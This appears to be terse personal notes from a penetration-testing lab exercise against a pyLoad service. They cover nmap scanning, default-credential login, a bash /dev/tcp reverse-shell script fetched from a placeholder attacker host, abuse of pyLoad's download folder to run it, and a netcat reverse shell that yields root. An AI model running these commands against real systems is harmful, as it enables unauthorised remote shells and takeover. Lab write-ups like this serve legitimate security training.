Enum
sudo nmap -T4 -A -v -o nmap --min-rate 1000 $IP
sudo nmap -T4 --script=vuln -v -o vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -o alltcp --min-rate 1000 $IP
sudo nmap -T4 -sU -sV -sC -v -p -o udp --min-rate 1000 $IP
sudo nmap -A -v -p- -o alltcpslow $IP
Services:
ssh 22
pyload 9666
Default creds on pyload worked:
pyload:pyload
Found these:
GitHub Download to arbitrary folder can lead to RCE PyLoad 0.5.0 Remote Code Execution ≈ Packet Storm
Trying the first one
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/<attacker_ip>/9999 0>&1' > evil.sh&1
sudo python3 -m http.server 80
nc -lvnp 9999
On pyLoad
Change pyLoad file permission settings
Change permissions of downloads: On
Permission mode for downloaded files: 0744
Create a package with link pointing to the attacker
http://<attacker_ip>/evil.sh
Edit package and change folder to /config/scripts/package_deleted/
Refresh package. Wait up to 60 seconds for scripts to be processed by pyLoad
Delete any package package to trigger the script
This did not work, back to other rce
Confirmed valid, now lets get shell
python3 exploit.py -t http://192.168.245.26:9666 -c 'busybox nc 192.168.45.171 4444 -e sh'
instant root.
proof.txt
b873d3335d7831c4e91fb12e6a9196eb